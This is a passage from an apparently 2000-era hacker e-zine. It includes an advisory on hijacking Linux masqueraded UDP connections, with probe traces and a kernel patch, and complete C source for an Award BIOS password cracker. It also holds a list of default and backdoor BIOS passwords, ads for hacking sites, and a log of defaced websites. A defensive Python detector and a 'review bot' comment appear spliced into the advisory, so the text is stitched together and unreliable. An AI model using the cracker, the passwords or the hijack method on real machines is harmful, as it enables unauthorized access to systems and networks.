      done because a number of hosts/services return UDP from an IP
      other than the one the original UDP packet went to - for example
      it is frequently the case that NFS servers just use the interface
      IP address "closest" to the one the NFS op came from.
  
      An attacker only needs to determine the local port on the masq
      gateway to be able to rewrite the masq table with their own
      address and port, which is trivial considering the relatively
      small port range set by default for use by masqueraded
      connections (61000 - 65096).  Now how do you determine which one
      of these ports is the local port on the gateway for the masq
      connection?  Easy, we send a probe packet to each of these ports
      and watch the IP ID field in the responses.  The IP ID field is
      sequentially incremented on each host's TCP/IP stack for each
      packet they send out, so the masq'd port's ICMP response will
      have the IP ID of the INTERNAL host, which is almost always at
      least 1000 away from the current IP ID of the gateway machine.
      See the Examples section below for packet traces of a complete
      scan/attack.
  
      Examples.  We know that example.com has a Linux masquerading
      gateway and that their DNS server is outside of this firewall.
      We can conclude that internal machines must be able to contact
      the external DNS server to be able to access the internet.  We
      start sending our probe packets:
  
          Host A is our internal workstation (192.168.1.100)
          Host B is our masq gateway (192.168.1.1 / 10.0.0.1)
          Host C is the DNS server (10.0.0.25)
          Host X is the attacker (10.10.187.13)
  
      ipchains -L -M -n on the masq gateway BEFORE the probes
  
          > UDP 03:39.21 192.168.1.100  10.0.0.25   1035 (63767) -> 53
  
      [ tcpdump from attacker's machine ]
      ( we picked source  port 12345 for our  packets just so the  trace
      would be easier to follow)
  
      [ snip -- this starts at port 61000 ]
  
          10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos
          0xd8] (ttl 245, id 13135)
          10.10.187.13.12345 > 10.0.0.1.63763: udp 0 (DF) [tos 0x18] (ttl 254, id
          23069)
          10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos
          0xd8] (ttl 245, id 13136)
          10.10.187.13.12345 > 10.0.0.1.63764: udp 0 (DF) [tos 0x18] (ttl 254, id
          23070)
          10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos
          0xd8] (ttl 245, id 13137)
          10.10.187.13.12345 > 10.0.0.1.63765: udp 0 (DF) [tos 0x18] (ttl 254, id
          23071)
          10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos
          0xd8] (ttl 245, id 13138)
          10.10.187.13.12345 > 10.0.0.1.63766: udp 0 (DF) [tos 0x18] (ttl 254, id
          23074)
          10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos
          0xd8] (ttl 245, id 13139)
          10.10.187.13.12345 > 10.0.0.1.63767: udp 0 (DF) [tos 0x18] (ttl 254, id
          23083)
  
          10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63767 unreachable [tos
          0xd8] (ttl 244, id 17205)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  
      The above packet's ID is substantially different; we may have
      found a masq'd connection !!!
  
          10.10.187.13.12345 > 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id
          23084)
          10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos
          0xd8] (ttl 245, id 13140)
          10.10.187.13.12345 > 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id
          23088)
          10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos
          0xd8] (ttl 245, id 13141)
          10.10.187.13.12345 > 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id
          23090)
          10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63770 unreachable [tos
          0xd8] (ttl 245, id 13142)
          10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id
          23091)
          10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos
          0xd8] (ttl 245, id 13143)
          10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id
          23092)
          10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos
          0xd8] (ttl 245, id 13144)
  
          [ snip -- all the way to the upper end of our masq ports ]
  
          ipchains -L -M -n on the masq gateway AFTER the probes
          > UDP 04:35.12 192.168.1.100  10.10.187.13   1035 (63767) -> 12345
          ^-------[ expiration of the udp tunnel has been updated ;)
  
      We now have  a working tunnel  from our host  to port 1035  on the
      inside machine!
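      A defender's check on the scenario above, added here as an example
      and not part of the advisory: this Python snippet parses two
      `ipchains -L -M -n` snapshots in the layout shown and flags UDP
      masq entries whose remote host/port was rewritten, plus any UDP
      entry talking to something other than the approved DNS server.
      The snapshot lines reuse the advisory's before/after entry; the
      second entry (192.168.1.101, masq port 64010) and the allowed
      endpoint list are constructed assumptions.

```python
import re
from dataclasses import dataclass

# One entry of `ipchains -L -M -n` output, in the layout the advisory shows:
#   UDP 03:39.21 192.168.1.100  10.0.0.25   1035 (63767) -> 53
# A leading ">" (the advisory's prompt/marker) is tolerated.
MASQ_LINE = re.compile(
    r"^\s*>?\s*(?P<proto>TCP|UDP)\s+(?P<expire>\d+:\d+\.\d+)\s+"
    r"(?P<src>\d+(?:\.\d+){3})\s+(?P<dst>\d+(?:\.\d+){3})\s+"
    r"(?P<sport>\d+)\s+\((?P<mport>\d+)\)\s+->\s+(?P<dport>\d+)\s*$"
)


@dataclass(frozen=True)
class MasqEntry:
    proto: str
    src: str    # inside host
    sport: int  # inside host's port
    mport: int  # gateway-side masq port (61000-65096 by default)
    dst: str    # remote host
    dport: int  # remote port


def parse_masq_table(text):
    """Return {(proto, masq port): MasqEntry} for every parseable line."""
    table = {}
    for line in text.splitlines():
        m = MASQ_LINE.match(line)
        if m is None:
            continue
        entry = MasqEntry(m["proto"], m["src"], int(m["sport"]),
                          int(m["mport"]), m["dst"], int(m["dport"]))
        table[(entry.proto, entry.mport)] = entry
    return table


def find_rewritten_entries(before, after):
    """UDP entries whose remote side changed while the inside endpoint and
    masq port stayed the same: the signature of the hijack described above."""
    hits = []
    for key, new in after.items():
        old = before.get(key)
        if old is None or new.proto != "UDP":
            continue
        same_inside = (old.src, old.sport) == (new.src, new.sport)
        remote_changed = (old.dst, old.dport) != (new.dst, new.dport)
        if same_inside and remote_changed:
            hits.append((old, new))
    return hits


def find_policy_violations(table, allowed_remote):
    """UDP entries whose remote endpoint is not an approved (host, port),
    for a site that only intends to masquerade DNS to one server."""
    return sorted(
        (e for e in table.values()
         if e.proto == "UDP" and (e.dst, e.dport) not in allowed_remote),
        key=lambda e: e.mport,
    )


# Constructed snapshots: the first line of each is the advisory's own
# before/after entry; the second (192.168.1.101, masq port 64010) is an
# assumed, unaffected DNS lookup included to show it raises no alert.
BEFORE = """\
> UDP 03:39.21 192.168.1.100  10.0.0.25   1035 (63767) -> 53
> UDP 02:10.05 192.168.1.101  10.0.0.25   1040 (64010) -> 53
"""
AFTER = """\
> UDP 04:35.12 192.168.1.100  10.10.187.13   1035 (63767) -> 12345
> UDP 01:58.40 192.168.1.101  10.0.0.25   1040 (64010) -> 53
"""
ALLOWED_REMOTE = {("10.0.0.25", 53)}  # assumed policy: DNS to Host C only


def audit(before_text=BEFORE, after_text=AFTER, allowed=ALLOWED_REMOTE):
    before = parse_masq_table(before_text)
    after = parse_masq_table(after_text)
    return {
        "rewritten": find_rewritten_entries(before, after),
        "violations": find_policy_violations(after, allowed),
    }


if __name__ == "__main__":
    result = audit()
    for old, new in result["rewritten"]:
        print(f"ALERT masq port {new.mport}: {new.src}:{new.sport} remote "
              f"changed {old.dst}:{old.dport} -> {new.dst}:{new.dport}")
    for e in result["violations"]:
        print(f"POLICY masq port {e.mport}: {e.src}:{e.sport} -> {e.dst}:{e.dport}")
```

      Run from cron on the gateway against consecutive snapshots, the
      rewritten-entry check catches the table change the trace above
      shows, while the policy check flags it even without a baseline.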
  
      We have demonstrated that it is possible for us to 'hijack' the
      external side of a masqueraded connection, so now what?  There is
      not a whole lot we can do to the closed local UDP port on the
      inside machine, so it's time to examine other
      applications/protocols that use UDP for transport and what
      security risks there are in allowing unrestricted external access
      to their source ports.  We leave this as an exercise to the
      reader...
  
      Following the "NetBIOS Info" thread on the Incidents mailing list
      at SF, Robert Graham mentioned a utility he wrote to automatically
      respond to NetBIOS port 137 name probes with a NetBIOS name
      lookup back to the originating host.  He mentioned that it seems
      to cut right through state-based firewalls and NAT systems
      because the response probe looks like a response to the outgoing
      probe.  Assuming that a host on an inside network is sending out
      these NetBIOS name queries, an attacker could exploit the Linux
      2.2.x vulnerability and be able to query the NetBIOS names of
      internal machines.  More info:
  
          http://www.robertgraham.com/pubs/firewall-seen.html#netbios
  
      SOLUTION
  
      In general the use of UDP masq for a firewalling gateway is not
      advisable - since the only thing that people are normally putting
      through the UDP side is DNS, you are much better advised to put a
      decent caching name server on the gateway box and block UDP
      through completely.
  
      The core problem is precisely not being able to actually _know_
      when the internal box has closed the port.  You can easily revert
      to the good "old" way (1 tunnel/pair) by commenting out
  
          #define CONFIG_IP_MASQ_LOOSE_DEFAULT 1
  
      at ip_masq.c:418 (stupid patch attached).  This should drop
      hijacking...  Of course, if we change the default, some way to
      enable it back perhaps on a per-application basis (ip_masq
      module) MUST be done.
  
      --- net/ipv4/ip_masq.c.dloose       Thu Mar 30 14:51:06 2000
      +++ net/ipv4/ip_masq.c      Thu Mar 30 14:57:24 2000
      @@ -415,7 +415,7 @@
       /*
        * By default enable dest loose semantics
        */
      -#define CONFIG_IP_MASQ_LOOSE_DEFAULT 1
      +/* #define CONFIG_IP_MASQ_LOOSE_DEFAULT 1 */
  
  
       /*
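      Review bot: Commenting out CONFIG_IP_MASQ_LOOSE_DEFAULT switches
      every masqueraded UDP flow to strict (1 tunnel/pair) semantics
      with no way to turn loose semantics back on short of editing the
      source, which the note above the patch itself says MUST exist
      before the default changes; consider a CONFIG option or a /proc
      toggle so sites that depend on replies arriving from a different
      address (the NFS case described earlier) can re-enable it
      selectively.  The comment block left in place, `* By default
      enable dest loose semantics`, now describes behaviour that is no
      longer the default and should be updated in the same change.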
  
      The issues causing  this DoS are  apparently more complex  than it
      may appear according to the discussion in the Linux kernel mailing
      list.  There is a patch for the exploit in 2.2.15pre-16 and it  is
      a noteworthy amount of code.
  
      @HWA              
        
265.0 AWARD BIOS password cracker .c source code
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      #include <stdio.h>
      #include <unistd.h>
      #include <stdlib.h>
      
      /*
       * NAME
       *
       *    awardpw -- Award BIOS Password generator and hash calculator
       *
       * SYNOPSIS
       *
       * awardpw
       * awardpw password1 [password2...]
       * awardpw {-r | -s} [-t target] [-l length] [-i randseed]
       *
       * DESCRIPTION
       *
       *    Without arguments, awardpw prints a usage message.  Given a list
       *    of passwords, it calculates the Award BIOS hash for each
       *    password.  Given option -r, it generates random, alphanumeric
       *    (digits and upper and lower case) passwords of the given length,
       *    matching the target hash.  Given option -s, it generates the
       *    sequence of all printable passwords of given length and target
       *    hash.
       *
       *    The default target is 0x1eaa, a common hash for the Award
       *    "override" password.  The default length is 4.
       *
       * NOTES
       *
       *    The "intended" override password for hash 0x1eaa was probably
       *    "AWARD_SW", though "j262", "Syxz", and others have been
       *    offered.  Someone reported "aLLy" (hash 0x1ea9) working for
       *    later versions of the Award BIOS, where the old passwords didn't
       *    work.  "AWARD_SV" has hash 0x1ea9, too.
       *
       *    On my Award BIOS (f000:fff5 date "03/10/95"), the password
       *    checking code uses the word at f000:ec60 for the override hash.
       *    If you have an OEM version of Award that doesn't respond to the
       *    "usual" overrides, you might want to check that word to see if
       *    a different override hash is sitting there.
       *
       *    Some combinations of arguments will generate plenty of
       *    passwords, some will generate none.  For example, there are no
       *    5-character plaintext passwords for the 0x1eaa hash, but
       *    4-character and 6-character passwords are plentiful.  This is
       *    just an artifact of the hashing algorithm used.
       *
       * AUTHOR
       *
       *    Kevin Buhr <buhr@stat.wisc.edu>
       */
      
      /*
       * the hashing algorithm: accumulate characters in a 16-bit register
       * with a 2-bit left rotate before each add.
       */
      
      int
      eval_pw(char *pw)
      {
          unsigned int accum = 0;
      
          while (*pw) {
              accum = (accum << 2) | (accum >> 14);  /* rotate left by 2 bits */
              accum += (unsigned char)*pw++;         /* add the next byte     */
              accum &= 0xffff;                       /* keep it 16 bits wide  */
          }
      
          return accum & 0xffff;
      }
      
      /*
       * fill pw with n random alphanumeric characters (0-9, A-Z, a-z);
       * each rand() value supplies up to four base-62 digits, so two
       * calls cover the maximum length of 8.
       */
      void
      rand_pw(int n, char *pw)
      {
          int i, j;
          unsigned int r, r62;
      
          for (i = 0; i < 2; ++i) {
              r = rand();
              for (j = 0; j < 4; ++j) {
                  r62 = r % 62;
                  *pw++ = r62 < 10      ? r62 + '0'             /* 0-9 */
                        : r62 < 10 + 26 ? r62 - 10 + 'A'        /* A-Z */
                        :                 r62 - 10 - 26 + 'a';  /* a-z */
                  if (--n <= 0) return;
                  r /= 62;
              }
          }
      }
      
      /*
       * advance pw to the next printable string (' ' .. '~' in each
       * position, odometer style); returns 0 once every position has
       * wrapped, i.e. after the all-'~' string has been tried.
       */
      int
      inc_pw(char *pw)
      {
          while (*pw == 126) {
              *pw++ = ' ';
          }
          if (*pw) ++*pw;
          return *pw;
      }
      
      char *argv0;
      
      void
      show_syntax(void)
      {
          fprintf(stderr,
                  "awardpw -- calculate Award BIOS password hashes\n"
                  "           (by Kevin Buhr <buhr@stat.wisc.edu>)\n");
          fprintf(stderr,
                  "syntax:\n"
                  "\t%s password1 [password2...]\n"
                  "\t%s {-r | -s} [-t target] [-l length] [-i randseed]\n",
                  argv0, argv0);
      }
      
      /* print random n-character passwords hashing to target; runs until killed */
      void
      try_random(int n, unsigned int target)
      {
          char pw[9];
      
          if (n == 0 || n > 8) n = 8;
          pw[n] = 0;
      
          fprintf(stderr, "target = 0x%04x\n", target);
          while (1) {
              rand_pw(n, pw);
              if (eval_pw(pw) == target) {
                  printf("%s\n", pw);
              }
          }
      }
      
      /* print every printable n-character password hashing to target */
      void
      try_sequence(int n, unsigned int target)
      {
          char pw[] = "        ";
      
          if (n == 0 || n > 8) n = 8;
          pw[n] = 0;
      
          fprintf(stderr, "target = 0x%04x\n", target);
          do {
              if (eval_pw(pw) == target) {
                  printf("%s\n", pw);
              }
          } while (inc_pw(pw));
      }
      
      int
      main(int argc, char **argv)
      {
          int opt;
          int length = 4, target = 0x1eaa, seed = 0;
          enum { NONE, RANDOM, SEQUENCE } mode = NONE;
      
          argv0 = (argv[0] ? argv[0] : "awardpw");
      
          while ((opt = getopt(argc, argv, "hrsl:t:i:")) != -1) {
              switch (opt) {
              case 'h':
                  show_syntax();
                  break;
              case 'l':
                  length = atoi(optarg);
                  break;
              case 't':
                  target = strtol(optarg, NULL, 0);
                  break;
              case 'i':
                  seed = atoi(optarg);
                  break;
              case 'r':
                  mode = RANDOM;
                  break;
              case 's':
                  mode = SEQUENCE;
                  break;
              default:
                  show_syntax();
                  exit(1);
              }
          }
      
          srand(seed);
      
          switch (mode) {
          case RANDOM:
              try_random(length, target);
              break;
          case SEQUENCE:
              try_sequence(length, target);
              break;
          default:
              if (!argv[optind]) {
                  show_syntax();
              } else {
                  /* no mode flag: hash each password given on the command line */
                  while (argv[optind]) {
                      printf("%s => %04x\n", argv[optind], eval_pw(argv[optind]));
                      ++optind;
                  }
              }
              break;
          }
      
          return 0;
      }
      
      
      @HWA              
      
266.0 Locked out? default BIOS/CMOS password list
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      GENERIC/pirate
      ~~~~~~~~~~~~~~
      bios
      setup
      cmos
      
      AWARD BIOS:
      ~~~~~~~~~~

      589589 
      PINT
      pint
      AWARD_SW      
      j262
      condo
      j322
      faada 
      AWARD_PW
      GO
      go
      shift+s y x z
      
      AMI BIOS:
      ~~~~~~~~~
      AMI
      AMI_SW
      AMI!SW/
      AMI?SW/
      
      @HWA
      
     
AD.S  ADVERTI$ING.       The HWA black market                  ADVERTISEMENT$.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                              _                _   _     _
                     /\      | |              | | (_)   (_)
                    /  \   __| |_   _____ _ __| |_ _ ___ _ _ __   __ _
                   / /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` |
                  / ____ \ (_| |\ V /  __/ |  | |_| \__ \ | | | | (_| |
                 /_/    \_\__,_| \_/ \___|_|   \__|_|___/_|_| |_|\__, |
                                                                  __/ |
                                                                 |___/
                                                                 
                                                                 
       ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG
       
       
       

        ______________________________________________________________
        
        French Hackers' Portal / Le Portail Des Lascars Francophones
        Links and News of interest / Liens et news pour lascars.  ;-)
        
        --------------------------------------------------------------
        ->->->->->->->->->  http://lascars.cjb.net  <-<-<-<-<-<-<-<-<-
        ______________________________________________________________

  


       
       
                      http://revenger.hypermart.net
                      
    
              T E X T Z             F I L E                 HOMEPAGE
                        http://revenger.hypermart.net
    
                   Here you may find up to 340 text files for:
         ANARCHY , HACKING , GUIDES , CRACKING , VIRUS , GENERAL , ELECTRONICS ,
         UNIX , MAGAZINES , TOP SECRET , CARDING , U.F.O.s , LOCKPICKING , IRC ,
         PHREAKING , BOOKS AND A-S FILES AVAILABLE!
    
                        http://revenger.hypermart.net
    
                                Visit Us Now !
           
       
         
       
       
       
                                               .
                                                        .
               ...............          .
               :             :     .  . . .  .          .
             __:________     :          :   ___________ . .   .
             \       < /_____:___       :  (      < __( :_______
              )                : )______:___\_     (___(     : /
        =====/________|_________/ < |      : (________________(======
               :           (__________________)         :wd!
               .             :          :               :
           - / -  w w w . h a c k u n l i m i t e d . c o m  - / -
               :        .  . . .  .     :               :
          .  . . .  .                   :...............:
                             .
               .


      
      
    **************************************************************************
    *                                                                        *
    *        ATTRITION.ORG     http://www.attrition.org                      *
    *        ATTRITION.ORG     Advisory Archive, Hacked Page Mirror          *
    *        ATTRITION.ORG     DoS Database, Crypto Archive                  *
    *        ATTRITION.ORG     Sarcasm, Rudeness, and More.                  * 
    *                                                                        *
    **************************************************************************      
              
 
    +------------------------------------------------------------------------+
    | SmoG Alert ..          http://smog.cjb.net/        NEWS on SCIENCE     |
    | ===================    http://smog.cjb.net/        NEWS on SECURITY    |
    | NEWS/NEWS/NEWS/NEWS    http://smog.cjb.net/        NEWS on THE NET     |
    |                        http://smog.cjb.net/        NEWS on TECHNOLOGY  |
    +------------------------------------------------------------------------+
       
    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * **
    *       www.csoft.net webhosting, shell, unlimited hits bandwidth ...    *
    *         www.csoft.net www.csoft.net www.csoft.net www.csoft.net        *
    *                                                                        *
    *                    http://www.csoft.net/                               *
    *                                                                        *
    *             One of our sponsors, visit them now                        *
    *                                                                        * 
    * * * * * * ** * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       
       

    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
    * 2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


        

     @HWA
     
       
              
             
HA.HA Humour and puzzles ...etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~
                                                 Don't worry. worry a *lot*
                                                 
      Not much this week, but this is worth a peek .. heh tnx multisync for
      the url... - Ed

      http://www.hardocp.com/news_images/2000/february_2000/bsod.jpg                                                 
      
       
      
                  
      @HWA
      
      
      =-----------------------------------------------------------------------=
      
      
                                   _ _
                               ___(_) |_ ___ ___
                              / __| | __/ _ Y __|
                              \__ \ | ||  __|__ \
                              |___/_|\__\___|___/       
       
       
     SITE.1
     
     -=- Fun =-
     
     http://www.howtoandroid.com/HowToBuildRobotHead.html
     
     Just go look :) ... - Ed
     
     
     
     -=- Hack/Security -=-
     
     http://root66.nl.eu.org
     
     {} (aka Frank)
     
     
     
     Cool site! Check it out, complete with interactive 'shell' to the
     root66 box...a must see. -  Ed
     
     
     
     http://users.javanet.com/~alden/indexa.html
     
     phluid (phluid@mindless.com)
     
     Just stumbled across this and what a sweet looking site, you have to
     check it out just to dig the layout/graphics. Very nice, content? well
     have a look around, but do check it out ... - Ed
     
     
     http://www.securax.org/
     
     (Belgium/Dutch)
     
     Submitted by: Zoa_Chien
     
     Nice site, well laid out but unfortunately for many of us it's not in English
     :( ... check it out all the same, news, exploits, latest file list from
     packetstorm, HNN affiliate etc.. - Ed
     
       
     
     -=- Telephony -=-
     
     http://twpyhr.usuck.com .
     
     Jenny
     
     
     Very interesting site for the telephone enthusiast, has lots of rare and
     entertaining recordings of phone system screwups and general messages/
     announcements etc, worth checking out, also check out the answering 
     machine OGM collection :-) fun stuff. - Ed
     
     -=- Employment/Skill testing -=-
     
     http://www.brainbench.com/
     
     Check out this site, test your sysadmin skills, even get certified online!
     post your stats to an online database and give the url to potential 
     employers etc, lots of services ... a must see. - Ed
     
     
     
     
     
            
     You can Send in submissions for this section too if you've found 
     (or RUN) a cool site...
       
        
       
      @HWA
       
         
         
  H.W Hacked websites 
     ~~~~~~~~~~~~~~~~
    
                    ___|                  _ \               |
                   |      __| _` |\ \  / |   |  __| _ \  _` |
                   |     |   (   | `  <  |   | |    __/ (   |
                  \____|_|  \__,_| _/\_\\___/ _|  \___|\__,_|


      Note: The hacked site reports stay, especially with some cool hits by
            groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

          * Hackers Against Racist Propaganda (See issue #7)

     
      Haven't heard from Catharsys in a while; for those following their saga, visit
      http://frey.rapidnet.com/~ptah/ for 'the story so far'...
      
      Hacker groups breakdown is available at Attrition.org
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      check out http://www.attrition.org/mirror/attrition/groups.html to see who
      you are up against. You can often gather intel from IRC as many of these
      groups maintain a presence by having a channel with their group name as 
      the channel name, others aren't so obvious but do exist.
      
      >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
      
      ========================================================================== 
      
      
      * Info supplied by the attrition.org mailing list.
      
      Cracked webpage archives (list from attrition)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.attrition.org/
      http://www.hackernews.com/archive/crackarch.html
      http://www.freespeech.org/resistance/
      http://www.rewted.org/cracked/
      http://www.403-security.org/
      http://www.projectgamma.com/defaced/
      http://www.net-security.org/
      http://www.netrus.net/users/beard/pages/hacks/
      http://212.205.141.128/grhack/html/default_hacking.html
      http://194.226.45.195/hacked/hacked.html
      http://alldas.de/crkidx1.htm
      http://www.turkeynews.net/Hacked
      http://www.flashback.se/hack/
      http://www.dutchthreat.org/
      http://www.onething.com/archive/
      http://www.2600.com/hacked_pages/
      http://hysteria.sk/hacked/
      http://erazor.vrnet.gr/
      
      
      
      
      Cracked sites listed oldest to most recent...does anyone read these? huh? do ya? heh.
      

       Date      OS Group/Person      AMCK Site                              2000
       ~~~~      ~~ ~~~~~~~~~~~~      ~~~~ ~~~~                          ~~~~~~~~
      
      [00.04.06] NT [TheHead]          M   Pana Real Estate (www.panarealestate.com)
      [00.04.06] NT [ph33r the b33r]   M   PC Star (www.pcstar.com)
      [00.04.05] NT [TheHead]          M   SparZone (www.sparzone.com)
      [00.04.04] Lb [System33]         M   War Industries (www.warindustries.com)
      [00.04.04] WT [#parse]               #2 WebThreads Server (frank.catalyst.net)
      [00.04.04] So [the saint]            Jessica Faltot (www.jfaltot.com)
      [00.04.04] BI [crazy bit]            High Circles (www.highcircles.com)
      [00.04.03]    [protokol]             Gulf Public Schools (www.gulf.k12.fl.us)
      [00.04.03] NT [Sabugo]               Transity 2000 (www.transity2k.org)
      [00.04.03] MO [BL4H & Omega]         Axon Technology Pty Ltd (www.axon.net)
      [00.04.03] NT [TheHead]              Support site for HomePage.com (support.homepage.com)
      [00.04.02] NT [ ]                    Job UK (www.job.co.uk)
      [00.04.02] NT [Omega]                Hallsville Independent School District (www.hisd.com)
      [00.04.02] Li [TankDS]               Farm Equipment Manufacturers Association (www.farmequip.org)
      [00.04.02] NT [ ]                    Center for Telecommunications Technology (www.brewtoncc.com)
      [00.04.02] NT [ ]                    Alabama Technology Network (www.atn.org)
      [00.04.02] NT [ph33r the b33r]       Alayam Press (www.alayam.com)
      [00.04.02] Li [ph33r the b33r]       Australian Information Processing Centre (www.aipc.com.au)
      [00.04.02] NT [Clientel]             ActivMedia (www.activmedia.com)
      [00.04.02] NT [Shadoze]              University of Sydney (Agriculture Dept) (agnis.agric.usyd.edu.au)
      [00.04.02]    [ph33r the b33r]   M   Sea Silver (seasilver.threadnet.com)
      [00.04.02] NT [TankDS]           M   ACDI/VOCA (www.acdivoca.org)
      [00.04.01] BI [McM4nus]              United Prairie (www.unitedprairie.com)
      [00.04.01] NT [Clientel]             Star Market Grocery Stores (www.starmkts.com)
      [00.04.01] Lr [Pakistan HC]          Shanghai Yellow Pages (www.shanghaiyellowpages.net)
      [00.04.01] Lr [McM4nus]              Museum Mania (www.museummania.com)
      [00.04.01] Bf [TnC]                  Lugano Synergy Investment Group (www.lsynergy.com)
      [00.04.01] NT [Sabugo]               Hed Foundation (www.hedfoundation.org)
      [00.04.01] NT [ph33r the b33r]       Find SVP (www.findsvp.com)
      [00.04.01] NT [Tranzer]              Finansekonomerna (www.finansekonomerna.su.se)
      [00.04.01] NT [d3th]                 Duxbury S.A. (www.duxbury.co.za)
      [00.04.01] NT [ph33r the b33r]       Developers Magazine (www.developersmagazine.com)
      [00.04.01] NT [ ]                    Secretaria de Estado da Saúde, Estado de Santa Catarina (ntses01.saude.sc.gov.br)
      [00.04.01] So [Seekret Hampster]     OT New Zealand (charon.ot.co.nz)
      [00.04.01] NT [TankDS]           M   Pede Tudo (www.pedetudo.com)
      
      
      
      

       Date      OS Group/Person      AMCK Site                              2000
       ~~~~      ~~ ~~~~~~~~~~~~      ~~~~ ~~~~                          ~~~~~~~~
      
      [00.03.16] NT [Blazinweed]       M   Zzyzx Diet Too (www.zzyzxdiettoo.com)
      [00.03.16] NT [nore]                 #2 Virginia Department of Criminal Justice Services (www.dcjs.state.va.us)
      [00.03.15] 95 [mojo]                 United Medical and Dental Schools of Guy's and St Thomas' Hospitals (tempus.umds.ac.uk)
      [00.03.14] BI [Perro Manson]     M   TeleColumbia (www.telecolombia.com)
      [00.03.14] NT [hack.be]              For Leaders Only (www.leaders.be)
      [00.03.14] Lr [m0s]                  Indian VXL Instruments Limited (www.vxl.co.in)
      [00.03.14] NT [wegro]                United Arab Emirates Ministry of Finance and Industry (www.fedfin.gov.ae)
      [00.03.14] NT [ka0x]                 Kuala Lumpur Department of Urban Transportation (www.jpbdbkl.gov.my)
      [00.03.14] NT [inferno.br]           Brazil Ministerio Publico Militar (www.mpm.gov.br)
      [00.03.14] NT [j0x]                  #2 UNESCO's Intergovernmental Oceanographic Commission (www.ioc.unesco.org)
      [00.03.14] So [GForce Pakistan]  M   World Company (worldcompany.com)
      [00.03.14] NT [hack.be]              Comptoire d'Escompte de Belgique s.a. (www.ceb.be)
      [00.03.14] NT [ ]                    Physical Therapist (www.physical-therapist.com)
      [00.03.13] NT [kione]                Servicio Nacional de Sanidad y Calidad Agroalimentaria (senasa.mecon.gov.ar)
      [00.03.13] NT [ka0x]                 Malaysian Treasury (treasury.gov.my)
      [00.03.13] NT [hack.be]              Belgium Centre National de Documentation Scientifique et Technique (www.stis.fgov.be)
      [00.03.13] Li [Malice]               Rotory Powered Freaks (www.wankel.net)
      [00.03.13] Li [Casey and Binary]     Prank.org (www.prank.org)
      [00.03.13] NT [Artech]               Music Lab Rehersal Center (www.musiclab.net)
      [00.03.13] Li [h3xx0r]               Matrix Pakistan (www.matrix.com.pk)
      [00.03.13] NT [ ]                    Lavallette, New Jersey (www.lavallette.com)
      [00.03.13] NT [hack.be]              Musees Royaux des Beaux-Arts de Belgique (www.fine-arts-museum.be)
      [00.03.13] NT [ ]                    Emergency Room (www.emergencyroom.com)
      [00.03.13] Lb [Ch1pBr34k3R]          Ellicit (www.ellicit.net)
      [00.03.13] 2k [acidklown]            The Church in Oklahoma City, Inc (www.churchinokc.org)
      [00.03.13] NT [aresnations]          Body Guard (www.bodygard.com)
      [00.03.13] NT [hack.be]              Belgische vereniging van Banken (www.abb-bvb.be)
      [00.03.12] NT [j0x]                  National Capital Planning Commission (www.ncpc.gov)
      [00.03.12] NT [Crime Boys]           #2 National Training Center, Bureau of Land Management (ntc.blm.gov)
      [00.03.12] NT [Cyber Fuckers]        Royal Danish Embassy in Cairo, Egypt (www.danemb.org.eg)
      [00.03.12] NT [rewted]               Unity College (www.unity.edu)
      [00.03.12] So [ ]                    Stanmore College (www.stanmore.ac.uk)
      [00.03.12] Li [DURO and Haze]        Rock Solid Internet (www.rsinternet.com)
      [00.03.12] NT [ ]                    Northampton Community College (www.northampton.edu)
      [00.03.12] NT [ ]                    Lander University (www.lander.edu)
      [00.03.12] Lr [ ]                    Junior College del Ecuador (www.jcollege.edu)
      [00.03.12] NT [ ]                    Guangzhou Book-selling Center Company (www.gzbookcenter.com)
      [00.03.12] Lr [ ]                    GS Security (www.gs-security.com)
      [00.03.12] NT [ ]                    Federação Catarinense de Municipios (www.fecam.org.br)
      [00.03.12] NT [ ]                    Fat Free Living (www.fatfreeliving.com)
      [00.03.12] NT [aresnations]          Fat Cat Multimedia (www.fatcatmultimedia.com)
